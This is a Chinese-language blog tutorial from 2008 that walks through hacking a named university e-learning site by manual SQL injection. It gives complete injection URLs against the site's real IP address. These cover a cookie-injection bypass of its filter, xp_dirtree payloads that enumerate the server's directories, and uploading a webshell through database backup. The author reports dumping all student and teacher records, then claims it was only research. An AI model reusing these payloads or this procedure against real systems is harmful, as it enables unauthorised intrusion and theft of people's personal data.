拿电子科大网络学堂手工注入(新手篇)

作者:许云风

很多朋友都说我拿站就只有图,现在写一个简单的过程!
没什么技术含量,别见笑!呵呵,开始了,1.先判断是否存在注入:在地址后面打上'
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'

1.jpg 大小: 64.33 K 尺寸: 500 x 407 浏览: 4 次 点击打开新窗口浏览全图

有防注入系统,限制了我的IP,现在就可以用COOKIES注入器
进入注入:

2.jpg 大小: 25.88 K 尺寸: 443 x 261 浏览: 4 次 点击打开新窗口浏览全图

填写相应信息,生成1.asp,放到我服务器上次,地址是:http://www.xuyunfeng.com.cn/1.asp
加上参数为:http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048
现在尝试注入;http://www.xuyunfeng.com.cn/1.asp?xuyunfeng=0048'

3.jpg 大小: 54.85 K 尺寸: 500 x 407 浏览: 8 次 点击打开新窗口浏览全图

提示出错,试了一下不能注入,到了这里一般的朋友都放弃了,现在我们回到原来的注入点
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048一:暴数据库信息:

1.判断数据库名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20db_name()>0%20and%20''='

4.jpg 大小: 62.55 K 尺寸: 500 x 244 浏览: 5 次 点击打开新窗口浏览全图

暴出数据库名为:wlxt

2.判断数据库用户名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20and%20user>0%20and%20''='

5.jpg 大小: 60.72 K 尺寸: 500 x 240 浏览: 4 次 点击打开新窗口浏览全图

数据库名为:wlxt136

3.判断数据库权限:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124)=1%20and%20''='

6.jpg 大小: 54.34 K 尺寸: 500 x 406 浏览: 4 次 点击打开新窗口浏览全图

暴出用户权限是:DB的,DB权限可以列目录,现在我们来列网站目录


二:列网站目录

1.创建表:xuyunfeng列C盘的文件和目录
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048';Drop%20TABLE%20xuyufeng;Create%20TABLE%20xuyunfeng(subdirectory%20VARCHAR(100),depth%20VARCHAR(100),[file]%20VARCHAR(100))%20%20Insert%20xuyunfeng%20exec%20master..xp_dirtree%20"C:\",%201,1--

7.jpg 大小: 66.71 K 尺寸: 500 x 406 浏览: 8 次 点击打开新窗口浏览全图

提示防注入系统,不用管它,创建表成功

2:暴出C盘的文件和目录个数
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))%2Bchar(124)%20From%20xuyunfeng)=0%20%20and%20''='

8.jpg 大小: 58.29 K 尺寸: 500 x 302 浏览: 4 次 点击打开新窗口浏览全图

暴出一共有13个目录和文件

3.列出第一个文件和目录(目录前面有0)
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%201%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

9.jpg 大小: 54.3 K 尺寸: 500 x 293 浏览: 4 次 点击打开新窗口浏览全图

第一个目录为:ASFRoot

4:列出第二个文件或目录:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%202%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

10.jpg 大小: 57.14 K 尺寸: 500 x 259 浏览: 7 次 点击打开新窗口浏览全图

第二个目录名为:Config.Msi

5.列第三个文件或目录名:
http://218.6.168.52/wlxt/listcourse.asp?courseid=0048'%20And%20(Select%20Top%201%20char(124)%2BCast([file]%20as%20varchar(8000))%2Bsubdirectory%2Bchar(124)%20From%20(Select%20Top%203%20[subdirectory],[file]%20From%20xuyunfeng%20ORDER%20BY%20[file],[subdirectory])%20D%20ORDER%20BY%20[file]%20desc%20,%20[subdirectory]%20desc)=0%20%20and%20''='

11.jpg 大小: 62.52 K 尺寸: 500 x 292 浏览: 7 次 点击打开新窗口浏览全图

第三个目录为:Documents and Settings
依次这样列出C盘的所有目录和文件,依次可以列所网站的所有目录和文件,从而找到网站
我已经找到了:d:\webroot\wlxt\现在拿到数据库的信息和网站目录,现在可以通过数据库备份
写上一句话木马:

三:上传木马:

1.用到工具,DB备份工具

12.jpg 大小: 71.15 K 尺寸: 500 x 463 浏览: 4 次 点击打开新窗口浏览全图

把得到的信息写到软件里,依次点击备份,不要管提示,我们看是否成功!

13.jpg 大小: 54.98 K 尺寸: 500 x 286 浏览: 4 次 点击打开新窗口浏览全图

备份成功了,现在用一个免杀大马

14.jpg 大小: 27.74 K 尺寸: 500 x 343 浏览: 7 次 点击打开新窗口浏览全图

15.jpg 大小: 114.51 K 尺寸: 500 x 298 浏览: 8 次 点击打开新窗口浏览全图

点"给我冲进去"看是否成功!
http://218.6.168.52/wlxt/help.asp

16.jpg 大小: 43.52 K 尺寸: 500 x 303 浏览: 4 次 点击打开新窗口浏览全图

成功了,输入密码进入!

17.jpg 大小: 77.26 K 尺寸: 500 x 302 浏览: 4 次 点击打开新窗口浏览全图

我们成功拿到webshell,结束了这次检测!

18.jpg 大小: 59.18 K 尺寸: 500 x 355 浏览: 7 次 点击打开新窗口浏览全图

我用工具拿到了整个数据库:包括所有学生和所有老师的信息,上面是所有老师的信息,但我们不能触犯法律,只是起技术的研究,有些并不是完全相同,好就到这了!
 

Posted on: 2008, September 19, 12:10 PM | Filed under: 渗透实例 |
Tags:asp_example

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »